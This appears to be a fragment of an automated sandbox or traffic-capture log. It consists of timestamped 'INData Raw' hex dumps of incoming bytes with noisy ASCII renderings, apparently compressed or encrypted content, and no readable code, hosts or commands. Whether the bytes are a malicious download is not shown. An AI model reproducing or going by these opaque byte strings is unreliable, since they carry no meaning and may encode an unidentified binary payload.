                                                                                                                                                        2021-12-28 02:24:06 UTC5551INData Raw: a4 40 ff f5 5e 6d 1d 0d f5 2b c9 39 40 cb de 33 ba a5 0d 1c a2 be 26 bb 4c 27 93 63 53 5e 02 5c 1f 81 ee bb bd 71 f9 3d 39 ee ed 68 29 ec 40 90 d9 89 b9 a6 4c 9f b1 0a d1 08 da 8a 9c e7 71 1e 81 01 54 4a 9f 45 14 b5 2c 28 8d ef 70 b3 c2 1c 89 de ae b3 d3 93 a6 61 8d a2 a3 c4 29 f9 3e 09 f9 af f6 12 02 b6 1e 64 ec 21 3d 73 9f 89 13 50 c7 cd 64 61 87 15 b3 4b ee a4 31 ef 51 e2 98 06 79 8e 64 35 cb 4a c9 54 a7 c3 d4 70 b0 f0 1f f9 d4 99 93 7f 56 4d 60 96 ad b2 3e d1 de c6 c0 77 e4 9a e7 b5 77 12 8a 37 d1 9c 07 7f e2 7e 77 ee 25 ff 2d 49 d3 8d 82 44 5b 22 44 28 ea ae a0 35 b4 2b 6b bb 09 98 cd 7c 98 4b 93 fe 95 c1 60 65 c2 02 3c c0 71 a3 dd ec c4 2c 70 40 6a 30 30 0b 60 2e f4 e9 72 8f 50 96 42 f9 d6 b8 5f 72 ad 0a f9 61 e9 31 c3 38 b5 61 65 91 23 20 20 93 38
                                                                                                                                                        Data Ascii: @^m+9@3&L'cS^\q=9h)@LqTJE,(pa)>d!=sPdaK1Qyd5JTpVM`>ww7~w%-ID["D(5+k|K`e<q,p@j00`.rPB_ra18ae# 8
                                                                                                                                                        2021-12-28 02:24:06 UTC5567INData Raw: f8 2d f9 19 45 a8 4e 1a b1 79 8e dd 38 8f 7b a6 b0 1b 07 1d 18 c7 a2 c0 1c 4a 93 70 3e 60 ed 88 75 5e 28 dd e1 b4 63 35 a8 a4 a7 85 be dc da ec eb 39 af 3b 99 d8 b4 e5 18 15 ab 27 47 b5 cb e0 9c c6 49 2a 54 f2 80 30 56 36 c8 a7 1b 87 f9 c0 9e ac 88 b2 e2 c3 fe b7 99 31 3c 71 b9 23 e9 0e 73 5f 07 f1 af 11 8c c2 91 32 17 b1 26 b0 35 2e 21 d1 05 dd 4a bc fd eb e0 77 02 79 47 fc 84 ee 25 84 8d 15 91 c7 a7 89 9f 8d 8c ea 4f f5 f5 36 0e 47 b0 52 aa 35 e0 33 a6 b8 50 55 12 19 88 75 4c 9c 2d 3a 49 0e 39 15 95 80 11 70 b6 a8 97 68 44 94 6b b8 de 1a 65 b1 0c bc d1 f6 e6 55 89 59 3c ed 42 c1 ca 0b f5 74 62 9d 44 83 6f f1 d7 af 49 b4 0b 71 d3 fd d7 70 16 fd ef ac 49 83 10 f3 d8 bd cc 2f 93 03 99 d1 63 28 03 dd 1e e6 fc c3 04 50 32 f9 b8 51 36 28 98 97 07 f7 39 79 91
                                                                                                                                                        Data Ascii: -ENy8{Jp>`u^(c59;'GI*T0V61<q#s_2&5.!JwyG%O6GR53PUuL-:I9phDkeUY<BtbDoIqpI/c(P2Q6(9y
                                                                                                                                                        2021-12-28 02:24:06 UTC5583INData Raw: e4 b6 ca a2 a0 ef e2 ec a8 ee 5a 45 c4 04 1d 06 c2 a8 50 e2 ee f1 a3 4e 01 84 d3 42 ab d5 3a 30 9d 87 7a f7 b3 b1 cd 61 35 06 ef e1 68 84 4b 1a b8 44 3a 30 f2 c2 02 5d 5e 53 76 34 34 d5 55 ff 3a d1 4c eb 15 cb a7 77 59 38 48 c5 ff 15 f6 c8 60 2d 37 13 a9 c4 e2 6a 51 6f 50 bc b4 e6 c3 a3 f8 fb 7a 17 62 de 49 1b ae 09 a3 91 28 aa 79 c6 52 79 37 e3 a2 cf 13 87 6d 33 4f 3a 11 ff e0 e5 dc a7 0b 2c 14 94 29 c7 85 2d ab d2 ec 11 d3 c1 08 90 f5 f4 74 5f 70 3e 26 6e 5f 4e 96 d0 5e 44 d0 ba 7b 18 76 d1 17 9e 8d 3a c2 e3 51 b3 3c a6 bd 33 12 27 3f df d6 0d 11 12 2c d6 95 02 99 87 41 44 d9 f4 94 d4 2f ff 71 e6 02 29 6e 61 b2 2b eb c8 f0 34 94 4f 2b 33 80 f3 3b f2 88 e1 59 0a 1c ea ec ae 84 b1 72 83 80 0b c2 d0 80 72 db 47 ee db 2f 03 54 86 bc 8b 0d 39 83 98 ad a4 72
                                                                                                                                                        Data Ascii: ZEPNB:0za5hKD:0]^Sv44U:LwY8H`-7jQoPzbI(yRy7m3O:,)-t_p>&n_N^D{v:Q<3'?,AD/q)na+4O+3;YrrG/T9r
                                                                                                                                                        2021-12-28 02:24:06 UTC5599INData Raw: 02 9f 0d 05 52 0c 05 92 bc 8a 7d 17 bd 0f 9b 3f 71 73 77 1a 6d 5f 59 ae c2 e8 a3 f9 e8 59 c1 80 b9 1a 74 13 bf 4d c8 9f f6 d0 08 cc fd 99 48 ed 0e c3 1e 5a ea 1c ee 7a ff 6e 0f 5b ac de b7 3c ea 9f 02 3b cf 18 05 34 7f ae da a9 3e f5 b9 16 ac 47 7b 48 96 06 49 03 55 67 a0 d7 6a 0f 20 78 48 5e 2c eb f5 f0 0a ff c9 28 6a a8 e4 d7 11 20 93 dd 77 42 fe 37 78 5b 17 74 37 3f 29 fe 23 d7 6f 4a 1f 65 02 26 15 89 b9 d3 53 4a f5 f9 65 35 41 01 c3 0b 59 d2 08 e3 e7 4e 49 82 cb c4 50 8b 45 d0 74 2c 42 50 ea 1d 35 16 77 5d c8 99 60 82 20 07 c4 b8 1f d2 b3 97 1d 9f f6 40 e5 8c a0 7b 5b 83 cd 11 9b cd 97 d1 42 29 7e e5 ad b4 3a 28 ed 2c b5 26 72 50 07 dd 0f 1a 51 7b a1 f4 5b 8e a1 c9 e9 49 b7 0d ca 10 6b 6e 80 43 3c e6 00 7e b5 3d 63 d3 da 4d cf ff 0f 9b b1 27 d2 5e bc
                                                                                                                                                        Data Ascii: R}?qswm_YYtMHZzn[<;4>G{HIUgj xH^,(j wB7x[t7?)#oJe&SJe5AYNIPEt,BP5w]` @{[B)~:(,&rPQ{[IknC<~=cM'^
                                                                                                                                                        2021-12-28 02:24:06 UTC5615INData Raw: b5 5c 11 dd fb ec a0 d6 2c e2 cb c2 2d 9b 29 fc 55 3a 6b 31 3b 3d 43 90 a6 8f d5 11 d5 e9 62 f5 c0 57 5b de 00 e9 5a 0c 7f 0b 9b 28 25 74 bd 0c dc 60 14 81 f2 86 fc 8b e4 f1 82 b8 24 7b f2 ec f4 f5 6b f4 53 20 0e ef ae 0a 4c f0 4c 2d 64 e5 48 b5 46 4c b5 18 eb 30 70 1c 78 d7 58 57 bf 88 d5 68 b9 c4 cd 0c 57 e2 82 44 43 36 ef f1 c7 75 5b 36 bd 70 15 7a a5 13 19 fb 6c 97 cd e2 d5 49 3d 0d af ef ab 6f c8 ff a4 70 af 65 9d 16 61 64 08 20 e6 e0 d9 ca 57 2b 11 7f 45 66 22 3e f1 bc c8 69 83 c1 12 66 a7 cc dc 03 ab de 30 dd 93 37 6d 62 d6 39 c5 64 d4 8e 2b 2c 17 5d 79 92 1d c8 15 a4 66 f6 02 d6 b5 8f 2a b7 cb 73 55 31 07 ab e9 f4 c2 73 30 4f 88 9d 88 43 61 58 f2 2b d4 7c ec e9 f4 da b4 7a c4 0a f3 0b 86 7a f4 05 f1 0b 63 ff e6 a7 3a c4 8f ff ba 5f 6c 4b 8a 27 82
                                                                                                                                                        Data Ascii: \,-)U:k1;=CbW[Z(%t`${kS LL-dHFL0pxXWhWDC6u[6pzlI=opead W+Ef">if07mb9d+,]yf*sU1s0OCaX+|zzc:_lK'
                                                                                                                                                        2021-12-28 02:24:06 UTC5631INData Raw: 8b e8 a1 0f 5d 7e 00 de 14 b8 f1 c2 c5 03 c7 0f 40 c8 3b fe 60 0f 8c 83 1c 0b 58 d7 9f 00 63 bd fd 31 f8 75 38 00 6c e0 13 29 05 36 53 12 0f 79 01 99 7d 63 0f 8d 4c b8 e1 49 16 ea 1f 00 29 86 f2 f7 18 e9 ae 14 00 33 d8 f6 25 03 02 ea 28 0e a6 d3 01 9e 81 d4 ba fb 90 d8 06 1b 2e 8b dd 54 00 5d 94 fe 1e 89 74 00 3e a7 f5 52 35 53 3c 48 4c a9 d7 26 aa a0 00 e4 67 b2 2e 7d c5 00 23 7c 53 e5 c2 4d 68 b5 00 15 f7 8f 0e 2a 18 28 a4 5c 14 82 00 35 19 7a 84 50 01 cd f2 21 00 1d c1 25 32 1c 04 0b f0 00 89 75 a0 d7 e9 69 c7 dd 2c 1a ca 87 00 df 22 b1 4d 49 78 00 c2 68 7f 5f 59 e4 06 3b f2 9a 00 12 7d 0e b1 83 f1 da 49 00 e0 89 e5 eb 2c 32 9e 93 0e 87 53 24 d1 40 0e 40 ac c7 35 17 48 d8 d3 00 8d 34 f5 49 e2 3c 00 29 7c 4f 2e 72 56 21 32 00 41 0c d8 ca fa a0 b0 7a 00
                                                                                                                                                        Data Ascii: ]~@;`Xc1u8l)6Sy}cLI)3%(.T]t>R5S<HL&g.}#|SMh*(\5zP!%2ui,"MIxh_Y;}I,2S$@@5H4I<)|O.rV!2Az
                                                                                                                                                        2021-12-28 02:24:06 UTC5647INData Raw: 42 00 50 bb 70 83 7d fc 00 bf 40 28 fb 06 91 0a be 2c 8d b8 4a 00 99 42 ef eb 93 10 00 e2 80 11 b3 7f c5 a2 86 0f 2c 08 44 e3 80 90 82 fe 81 cf 00 38 88 a6 fb ff 94 69 8a 00 0c f7 10 a5 0f a3 2c 05 76 18 00 89 73 16 57 13 a1 22 9f fa da 00 41 72 ad 2d 4f 30 17 80 3e 39 c2 82 8b ea 1a 73 78 40 2d 0c bf 50 08 a2 3c 00 4d 75 07 87 fb 48 51 02 1d b0 4e 71 2c 0d 00 82 35 de 60 39 38 00 0f 30 87 43 83 8a 80 70 75 90 00 c3 8e 24 85 a9 5e 0f 54 00 2d 05 99 03 0d c2 16 70 39 0e 86 8f 0b 26 0c a1 6a 0a 02 06 db a1 04 07 61 0f c4 09 40 7d 01 00 a6 91 c3 7a e9 38 bc 87 02 36 8c 10 64 65 09 60 57 f7 88 00 9e 8d 08 9a 8e 11 cb 22 00 fc 20 31 8f 44 62 cf 40 00 90 2d cc 69 43 09 59 88 98 8d 1e 2e 8b 77 80 b2 0e b7 12 56 ae 76 26 00 17 23 24 ad b4 4a b9 9e 07 7a c1 f1 8b
                                                                                                                                                        Data Ascii: BPp}@(,JB,D8i,vsW"Ar-O0>9sx@-P<MuHQNq,5`980Cpu$^T-p9&ja@}z86de`W" 1Db@-iCY.wVv&#$Jz
                                                                                                                                                        2021-12-28 02:24:06 UTC5663INData Raw: 28 a9 e8 27 18 0f 17 35 80 3e 61 64 5e 1a 2e f3 90 f5 48 2d 00 1c 76 d5 92 19 ad 83 6a 06 1e c3 90 8b 3a 9a 1c 67 3f 4a 80 5b 45 b7 ef 9b 4b 7a e7 e8 51 cf 09 57 02 3c 0c 18 c0 97 08 1c 19 39 c0 20 0f 24 02 28 24 2c 08 30 90 34 22 38 7e 3c 7f e0 fc fa 1e 1f 77 02 81 31 c9 e8 17 f0 cc c2 57 07 89 7b c1 74 c0 00 cf f7 d9 83 00 e1 07 29 ca 98 c3 10 8d 50 e6 d1 1c 0b 03 32 18 09 75 80 32 48 0f 91 0c 79 22 03 44 06 88 76 47 c8 a8 05 10 04 00 7e 81 02 03 01 fb 07 9a b0 a2 e8 08 00 e2 f0 c1 e9 24 e6 59 ac 06 0a 33 2d 4f 45 4a 00 43 44 40 3d 8a b1 2b 5f f6 84 00 fb 23 e4 ca a1 c6 f7 6b 7b a9 00 18 75 25 6e 5b 76 7b e3 0e 1d 83 f9 10 73 fe 00 b5 f2 7a 24 3e c6 00 40 9f e9 7c 5d c8 b1 27 00 77 ed 57 97 f4 04 09 89 00 5c 84 6d 32 e4 65 0d ea 00 e0 f6 01 63 c1 30 85
                                                                                                                                                        Data Ascii: ('5>ad^.H-vj:g?J[EKzQW<9 $($,04"8~<w1W{t)P2u2Hy"DvG~$Y3-OEJCD@=+_#k{u%n[v{sz$>@|]'wW\m2ec0
                                                                                                                                                        2021-12-28 02:24:06 UTC5679INData Raw: 1c aa b2 55 00 34 29 33 c9 0b a7 71 24 00 25 54 14 5a 77 5b eb 41 02 88 55 ff 7b 98 c7 5d 00 c4 37 a3 f4 d6 00 be cc a2 2c c6 0e 80 7d 3d dc 9d 80 fa 54 4a c3 ae d9 10 00 2e ac 0c a4 ba b6 5c c9 1c 08 d6 53 81 9f 42 d8 57 70 f8 bf ed 00 e5 af 71 34 85 c7 43 08 00 16 63 b8 3e 50 07 8d 22 00 83 90 97 f1 21 84 73 8e 7c 01 12 43 10 d5 00 4a 0d ea 28 a8 03 00 17 ff 50 20 fd 7c 52 2e 00 5b e2 72 2f 5e 71 ac ea fa 9a 00 d0 ff 7d d4 6b 4d 1d cb ee db 03 5d ec 40 a9 34 59 88 35 6f ed 00 e4 cc d8 75 7b 90 23 27 00 e7 3f fd 04 d7 a9 4a b8 00 85 40 2b c7 99 3b 09 55 1c 0c 75 07 81 d8 77 02 44 eb cc 7f 40 00 b9 a0 16 cf 8d 54 3b 6a 00 10 a6 45 ab ce 14 04 2f 00 c5 01 c6 67 38 aa d9 05 00 11 53 0c 63 0e 29 31 82 1e 19 92 eb 80 49 39 7e c5 c2 26 00 3c 2c fb 05 23 2a c7
                                                                                                                                                        Data Ascii: U4)3q$%TZw[AU{]7,}=TJ.\SBWpq4Cc>P"!s|CJ(P |R.[r/^q}kM]@4Y5ou{#'?J@+;UuwD@T;jE/g8Sc)1I9~&<,#*
                                                                                                                                                        2021-12-28 02:24:06 UTC5695INData Raw: 93 cf a4 26 21 79 01 aa 3c dc bd 39 73 fb c0 c2 6b 03 f5 ac 47 77 e5 6e 00 c8 ba 20 0e 90 ec c8 9b 00 8d 09 01 3a 46 5c 41 15 07 c5 fa dc 7e 51 00 dd e3 18 8c 0e 44 77 d1 16 00 b1 62 bf a7 3f 07 35 e1 f0 fa d5 02 59 97 c0 ad cd 0c f2 9f 90 99 00 22 b9 ce 80 56 33 7b 8d 70 aa 00 a3 9b ec 7d f1 d5 17 52 50 e2 fb 84 0f b6 6a 7e a6 09 19 00 1f 0b 57 45 a4 03 85 9a 42 7d 73 99 00 7c 24 aa b5 f1 0a 94 4f 0e fc 22 71 d1 00 02 fe 40 57 68 f4 1f 1c 23 74 01 00 f2 0f 19 87 50 70 00 38 56 03 ca ae b7 99 80 07 e8 d0 90 ff 6b 00 2b e7 7c c3 0e b0 ec b1 c0 00 87 36 a8 af 47 00 f9 6a 8c 26 99 d5 76 03 00 43 7c 04 f4 d7 70 46 38 38 2d 63 00 3e 25 e7 1e 47 f3 c8 75 bf 1e d7 d3 8e 00 4a 92 86 c0 3b 9d b8 14 38 75 a1 00 0c 25 b8 31 af 07 57 00 48 17 ce 92 52 ae 1c e9 90 74
                                                                                                                                                        Data Ascii: &!y<9skGwn :F\A~QDwb?5Y"V3{p}RPj~WEB}s|$O"q@Wh#tPp8Vk+|6Gj&vC|pF88-c>%GuJ;8u%1WHRt
                                                                                                                                                        2021-12-28 02:24:06 UTC5711INData Raw: 97 fd ff 86 ed 34 0e 4f cd 1d 59 c0 ec a2 25 c3 5d 26 df e7 56 00 66 0f bb fe 49 fa 00 da 1b 7d 0c 99 60 3a 6d 05 1f 58 30 5f 73 c0 f9 54 11 c6 13 7a 24 02 02 6b dd 0b 5a 40 1b 16 5e 00 94 70 e8 53 58 6e 40 d9 12 48 c2 2f 03 91 f1 89 f8 f7 60 4e 5a b0 2b 02 a7 24 87 77 0b e2 e0 29 41 05 02 c6 61 b9 64 b1 18 e0 4d 3f 0a 07 c3 77 5f fd 92 b0 c5 4c 06 5e 3e f0 ae 80 6a d8 94 fa 51 82 69 3a 4a 33 82 57 d2 fd 5a b5 f5 e0 9d ed 8b 0e 40 9c dc b8 c0 a5 11 ae fe 4a 00 45 64 68 3d 2e 6c e8 80 39 85 44 80 39 28 a1 c5 81 e0 c9 71 86 7e 7c 06 b8 ac 8d a6 37 54 72 a2 07 1c aa cf 57 54 e0 72 76 cc 77 00 a7 95 fd 27 65 cd fe 21 b0 c0 71 5e 00 90 3e dc 17 74 7d 8a 05 0f 3c 88 ad 6b 80 b0 f7 bb bc 5f 1e db cf 62 40 14 57 12 da b2 11 03 ca 02 8b 93 cd d1 9b 15 e0 01 89 fe
                                                                                                                                                        Data Ascii: 4OY%]&VfI}`:mX0_sTz$kZ@^pSXn@H/`NZ+$w)AadM?w_L^>jQi:J3WZ@JEdh=.l9D9(q~|7TrWTrvw'e!q^>t}<k_b@W
                                                                                                                                                        2021-12-28 02:24:06 UTC5727INData Raw: ed f8 81 01 02 c6 18 32 11 80 2d 40 e0 62 4c 08 00 76 8e 44 8a f2 c4 09 3d a0 e2 8c a8 1e 14 64 05 40 19 54 59 29 90 81 1f 79 c0 5b 40 24 8b 93 2d 7c 15 98 be 76 13 7c bd 07 48 86 77 91 a9 e7 de af 20 3c 2c 29 f0 40 0f 58 20 16 a5 40 d2 97 68 86 f7 38 73 0a 80 05 7a 76 19 eb 28 3e 60 5f 30 b3 7c ac a7 1e 52 09 07 40 16 4f 1e 50 21 72 30 97 14 c6 f4 82 6d 1c 7c 60 74 52 0e 00 0c 1e 91 2e 0a 3e 00 eb 50 8c d4 56 80 65 ed 03 5e 3c f5 f1 d6 33 00 98 89 db 2c ac b8 e3 ad 03 4d 92 b1 ea 12 c1 a0 36 ec 7f 00 6a b2 62 eb 58 cd 0a 3a 39 2c 07 cf ac 14 78 7d 24 1d 33 c9 f8 00 5d a0 11 c8 16 87 1e 10 4c 88 c0 79 3b 5e 22 25 2a 2e 8a d1 80 12 07 00 b7 42 17 c8 f0 52 00 55 e5 fd 97 13 9a 0a c2 00 5b 62 5e e4 bc 5a 49 e9 09 84 5f d9 04 00 d9 20 34 38 1d 17 36 44 58 00
                                                                                                                                                        Data Ascii: 2-@bLvD=d@TY)y[@$-|v|Hw <,)@X @h8szv(>`_0|R@OP!r0m|`tR.>PVe^<3,M6jbX:9,x}$3]Ly;^"%*.BRU[b^ZI_ 486DX
                                                                                                                                                        2021-12-28 02:24:06 UTC5735INData Raw: c0 40 db ac 30 1c c8 88 09 e9 40 19 8c 5f d8 8a f8 d1 42 eb 01 f0 35 24 20 83 bc 1c 1c 00 eb 31 c1 97 da ba 80 fa 00 d3 5b f7 72 d2 1f d1 89 07 d0 d6 c0 fc 99 81 c8 5e b4 e7 d8 b0 20 2a 00 d8 bd dc d4 9d ff bc f8 00 5b cb ef 36 b8 16 19 03 00 c3 c6 0e 54 f5 77 23 e7 58 24 84 00 02 5c 33 01 53 57 9a 00 b2 ff eb de 27 68 28 fc 00 a4 51 52 45 89 09 85 b1 02 0f a2 61 08 8a 02 80 c1 e8 af 67 0a 3c 2e 5f 00 42 49 75 f0 b0 a1 b9 00 05 96 dc 2b 09 a2 5a 57 3a 6c a0 9d bb 7d c0 a4 04 0c d1 e0 03 00 42 86 ed 32 7f 66 e1 3f 00 fc 0b cc 02 22 1c 8b 6b 78 20 03 25 a7 5a 95 a8 ee a8 d0 d2 bf 00 c8 46 c6 fe 50 98 87 79 f6 58 7e c2 00 05 78 8d 04 06 fb a2 ab 00 7e f6 20 2e 03 fe 37 0f 00 e9 e7 d7 fd 0d 48 54 7a ee 08 00 32 80 22 8b 13 07 03 c6 00 ab f3 0f 19 47 44 3a 3b
                                                                                                                                                        Data Ascii: @0@_B5$ 1[r^ *[6Tw#X$\3SW'h(QREag<._BIu+ZW:l}B2f?"kx %ZFPyX~x~ .7HTz2"GD:;
                                                                                                                                                        2021-12-28 02:24:06 UTC5751INData Raw: 21 dd ca 7b 80 64 74 b7 70 2a 02 0b f3 02 75 06 82 60 d0 01 57 00 d0 30 52 f4 12 23 03 af 00 41 8b f8 7f b5 5d ff ce 00 24 0b e8 54 dd eb 44 60 00 bd 76 6f 11 47 2a 7e f1 07 53 be 04 22 9d f0 a4 ab 89 b6 00 12 d4 29 23 30 8b 1b 50 07 66 07 36 fe 2c 80 25 7d 03 78 00 1d 52 21 0b 64 c4 f0 88 3c 9d e4 01 b8 71 cf b1 93 ff e8 56 da 00 bd fb 18 46 fc a5 6b 8d 00 42 df 47 be 49 40 74 31 04 35 e3 6c ac b2 c0 b7 7e 2e d4 24 38 4b 01 25 7e 89 00 eb c5 c4 91 41 b9 00 3c 10 29 cc 89 48 65 0d 00 4c fa 76 03 e7 f3 a4 68 00 58 ec 4e b4 bc cf 96 ad 00 82 79 30 60 38 50 e8 3f 77 de 76 ec 0f 86 89 e0 b9 a5 13 5b 80 6f 81 c2 35 00 fb 14 04 a8 cf 76 c0 d2 ec 49 0f 77 ee ff 0e e5 18 6a 81 e6 e5 7d 80 32 9a 89 c2 e9 68 04 00 5a 50 5d a1 ab 58 25 87 3c 4c 49 f2 07 34 a6 6b 86
                                                                                                                                                        Data Ascii: !{dtp*u`W0R#A]$TD`voG*~S")#0Pf6,%}xR!d<qVFkBGI@t15l~.$8K%~A<)HeLvhXNy0`8P?wv[o5vIwj}2hZP]X%<LI4k
                                                                                                                                                        2021-12-28 02:24:06 UTC5767INData Raw: 36 00 c9 10 46 83 fe 05 00 13 72 ed 8d bb 1d 78 aa 00 f3 06 50 8b cf e8 80 39 07 ba 9a 4d 0b 17 37 15 d0 59 c3 d9 6c 00 31 e4 54 db 80 1c 10 73 fc f9 07 f6 81 52 8a 14 f3 d8 d0 f0 26 e2 0f 70 1c 00 34 24 46 eb 60 75 3f 28 1c 6a e3 b3 40 fb 18 4b c0 03 f2 03 7e 4e 11 81 fe f5 83 7d 00 4c 4c 34 23 48 75 88 d8 01 4d 2c 7f ea 32 eb 36 e4 11 83 2e 96 6a 05 07 5b 86 0f cb 86 cb 07 ce f0 64 00 0b 77 13 71 17 c6 43 a3 07 24 81 46 48 94 a7 ed d0 82 0f 8c 73 4c c9 51 00 31 86 c7 a0 4b 10 52 03 14 e8 d5 fb ab ac f0 28 84 24 07 29 ee 8b 91 57 f0 50 90 52 22 3e b0 8c ae 11 c5 00 51 46 23 c0 29 91 fa 50 00 c6 83 2e 64 02 6e 61 80 00 bc 04 47 2b 32 75 08 6a 00 16 c0 0d f0 eb 52 07 1b 0e 48 60 7f 51 60 65 21 d2 c5 be 00 45 6e 80 23 88 10 40 0b 00 41 4e 75 f7 14 4b a9 47
                                                                                                                                                        Data Ascii: 6FrxP9M7Yl1TsR&p4$F`u?(j@K~N}LL4#HuM,26.j[dwqC$FHsLQ1KR($)WPR">QF#)P.dnaG+2ujRH`Q`e!En#@ANuKG
                                                                                                                                                        2021-12-28 02:24:06 UTC5783INData Raw: e3 63 66 2e 20 6b 0b 3f 62 72 6d 75 68 53 51 6f eb 64 51 2c a2 95 1e 75 43 af 09 90 c1 e8 06 6c d2 09 45 e5 22 18 b6 02 7f 47 a6 f1 7e 41 ff da b3 f5 14 23 4d 6f c1 3f 6c 4a ac 11 6f 46 ac 41 27 4c 7b 6f f5 d2 93 53 fc f6 b3 8c b4 a9 a4 d6 b0 df 00 ea 60 00 30 f7 31 02 00 de 72 4d b5 41 45 00 00 00 3e 00 00 68 72 36 a9 34 b6 c0 61 a4 0a f4 bf ba 30 62 63 37 74 e9 e9 37 6b fd 2a a7 be 71 49 f2 b2 46 ac 95 1a 29 fe a6 27 1d e0 d0 e3 15 0c 1b 00 53 9f fb 1b cd 20 52 41 26 40 8a ef 6f f2 c1 8c 55 c9 fa b1 bc 3c 94 3f 4d a8 f1 b6 22 f1 66 c7 07 f2 3c f6 8b ff 37 39 03 5d 09 fd 8e 87 d9 bb 24 fa 94 4d c7 a1 0b 59 8a 72 45 e3 b3 17 6d 35 24 98 0b b6 c3 36 d5 13 cf 98 23 8b 7a 4b 75 32 14 4f a0 5d d0 15 30 77 cf 62 05 13 f6 b5 c8 05 65 3e 06 f8 43 3a 39 76 62 a7
                                                                                                                                                        Data Ascii: cf. k?brmuhSQodQ,uClE"G~A#Mo?lJoFA'L{oS`01rMAE>hr64a0bc7t7k*qIF)'S RA&@oU<?M"f<79]$MYrEm5$6#zKu2O]0wbe>C:9vb
                                                                                                                                                        2021-12-28 02:24:06 UTC5799INData Raw: 91 ba 4a 38 d3 5d ae bc 36 20 5d e7 ca 58 1d 73 c8 88 eb 9b d5 5f ca 3b e8 ed ac 6a b0 b6 54 d0 ba a8 c8 3a 36 aa 6c d1 97 81 37 20 df cb b8 1f 7a cf f3 97 f7 e9 ce a8 87 ee d0 39 db 89 40 3b b0 94 76 a1 29 98 ce b1 ab f8 b3 81 3f 1e fc bd e4 4c bc 35 3b 73 d7 1f 62 42 17 26 92 4e ad f8 11 11 c3 f9 a6 4e 24 da 0e db 62 15 7f 71 0b 6a 77 4a 9c c8 03 35 ee 71 8d 80 72 15 c5 25 57 73 5d 8b 86 c1 61 9c fb df 96 d6 41 2d 95 ab 86 58 ba 37 5e d6 4d ac e8 c0 59 6a 60 a0 35 b2 ca 2e c9 4c 76 5a 4b fa 70 5f 9a 58 ec 85 ba 1e 9f ec ed 9e 21 7e 3d e0 6b ea 00 df b0 43 14 bb 8c f9 94 a3 db 08 39 23 88 8d 52 8e 02 fb e2 05 1e 05 f1 15 0e 11 b8 43 5b e6 37 67 12 5c 2d b7 2b 8f d7 1d 10 a2 24 f6 f9 bc cf be 82 46 eb 99 e7 66 ff 7e c8 e3 68 7f 83 d6 ff 1b 44 ae 68 4a 33
                                                                                                                                                        Data Ascii: J8]6 ]Xs_;jT:6l7 z9@;v)?L5;sbB&NN$bqjwJ5qr%Ws]aA-X7^MYj`5.LvZKp_X!~=kC9#RC[7g\-+$Ff~hDhJ3
                                                                                                                                                        2021-12-28 02:24:06 UTC5815INData Raw: 36 78 4f 4c 11 15 28 85 b0 0a 4b e1 6a 55 c3 d9 0c 29 c8 f2 ee 60 7e 3c 19 84 87 2e e4 86 5d f3 cf db b7 e0 eb b9 93 ae 61 e0 5f bb 3d b1 a1 2f dd 02 52 1c c4 e5 c0 a7 6a 32 6a 09 48 eb 67 62 3a 26 98 d9 f2 a2 54 1c dd 4c 45 e5 83 72 94 0f 41 6f 23 68 53 c3 bc 67 dc 3e 69 8a 93 a6 b8 f8 a6 d4 77 79 6c e9 ff d4 91 66 c2 ac 02 a9 09 c4 da 6c 40 6b 92 ac 74 66 1d 9b af ce 6f 61 7d c0 8d 97 b8 29 65 3b cd d0 ff a2 82 61 7a 87 3b 05 28 09 cc 5b 0f 76 44 e2 40 e0 a7 4e 36 ad 15 14 57 8a 7a b8 16 8b db 3a ec b0 51 8b a4 93 20 bd 78 20 5f 3c 19 34 ac 28 d0 42 b9 df 91 b4 68 10 91 18 e3 d0 6d 33 f7 cb 4b f6 15 62 e3 00 dd f1 fb f1 e7 1e 66 3a 80 42 97 55 af 48 07 e1 00 3e 83 e6 98 0d 0d bb eb f0 f3 52 ad 36 f9 ed 18 cb 5f 91 6f b3 99 1e 70 40 50 3d 38 d1 1e 77 da
                                                                                                                                                        Data Ascii: 6xOL(KjU)`~<.]a_=/Rj2jHgb:&TLErAo#hSg>iwylfl@ktfoa})e;az;([vD@N6Wz:Q x _<4(Bhm3Kbf:BUH>R6_op@P=8w
                                                                                                                                                        2021-12-28 02:24:06 UTC5831INData Raw: 59 86 f0 c4 cf 74 df 6b fb 4b bf 01 1b 82 2a 0f 1c d7 6d 6f 3a 42 d1 bc 87 90 57 1c e9 83 b9 2b f0 a8 92 eb 20 4c a9 5f 1d 4f b0 7b 80 f9 4c 89 fd 29 01 3c 1c ad 59 df 1d 60 11 fd 8a 0d a9 a7 f0 f4 37 c4 31 dd df 73 2b e3 39 18 88 87 9d 5e 63 b1 63 4f 31 72 3c 2e 3a f3 ff 97 ef 77 3b 79 61 8f df a3 03 e1 3d da b3 02 22 32 4c 04 ad 98 c6 cf 5c b2 32 16 9b 98 d7 bc a7 fd cb 46 01 d0 98 af f6 d5 26 26 c8 34 8a 84 57 d6 fd fd 39 fc 4a 33 70 c3 2b e4 3a 6b fe 7d a2 25 6b 56 de dd c2 db 64 1c 70 ba 63 04 ed 88 bf 7d 30 24 a4 e7 31 8e 9b cc b8 30 98 68 50 c3 ed b7 b3 48 30 3c 3d 6c fd ce 3f 47 5c 7b 9d 3e 6d 99 79 01 cb 24 33 22 e1 56 14 2a f1 e3 23 84 1b c5 d0 60 70 20 14 67 6d a3 94 ce 76 21 62 13 0b 31 af f0 f8 54 07 21 55 60 4f 78 18 ee 7a 6b e9 3d 1e 62 3d
                                                                                                                                                        Data Ascii: YtkK*mo:BW+ L_O{L)<Y`71s+9^ccO1r<.:w;ya="2L\2F&&4W9J3p+:k}%kVdpc}0$10hPH0<=l?G\{>my$3"V*#`p gmv!b1T!U`Oxzk=b=
                                                                                                                                                        2021-12-28 02:24:06 UTC5847INData Raw: e7 6c c4 dc 45 9c 0d ac dd 43 02 bc 7f 5b bd e1 5a 3e 12 aa 97 cc a4 ee fa b0 f7 29 83 a0 ff a5 2d c5 f4 e0 05 68 0b ae 99 85 1f ea 5c c9 38 af 60 1c 96 b3 03 20 8b a2 12 c8 80 f3 ab a8 c6 b3 db 94 45 8c 71 b2 b4 98 68 c9 90 62 b7 b2 da b8 88 56 21 01 85 d4 bb 13 14 da d1 f4 77 1c 1c d5 0a cd 66 a7 64 ce 22 1d 8a f2 0b 66 a1 a0 be c8 93 e8 01 99 1b fa 35 93 39 94 4d 82 4b b4 d6 7e 5d d0 0e e5 36 7b 29 be b5 80 d7 dc 73 d2 e4 09 1b 7e de 66 e4 94 79 3b 98 a8 30 53 05 9c c2 f0 41 1f b3 34 fe 9c 71 9c e6 05 2d 11 be 74 6c 55 61 89 7a 7c 28 b2 ff 18 97 50 9c 06 6c dd d1 c6 4c b2 0e da dc cf 45 9d f0 83 bd a5 